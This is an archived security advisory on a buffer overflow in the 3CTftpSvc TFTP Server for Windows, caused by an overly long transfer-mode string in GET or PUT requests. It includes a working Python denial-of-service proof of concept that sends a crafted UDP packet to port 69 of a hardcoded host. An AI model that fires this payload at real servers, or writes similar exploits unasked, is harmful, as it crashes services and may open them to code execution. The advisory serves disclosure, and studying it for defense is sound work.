TUCoPS :: HP Unsorted T :: c07-1011.htm

TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode)
TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode)
TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode)


TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode)

------------------------------------------------------------------
SUMMARY:

3CTftpSvc TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
(http://support.3com.com/software/utilities_for_windows_32_bit.htm 
or ftp://ftp.3com.com/pub/utilbin/win32/3CTftpSvc.zip) 
It provides an implementation of the TFTPv2 protocol.

A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers to execute arbitrary commands or cause a denial of service. This flaw is due to a buffer overflow error when handling an overly long transporting mode (more than 470 bytes) passed to a "GET" or "PUT" command, which could be exploited by malicious users to compromise a vulnerable system or crash an affected application.
----------
DETAILS:

 Vulnerable systems: 3CTftpSvc TFTP Server 2.0.1 and probable prior
 
Exploit:

#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except: 
    print "socket() failed"	    
    sys.exit(1)

filename = "A" 
mode = "netascii" + "A" * 469
da = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(da, (host, port))

------------------------------------------
Liu Qixu
NCNIPC

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH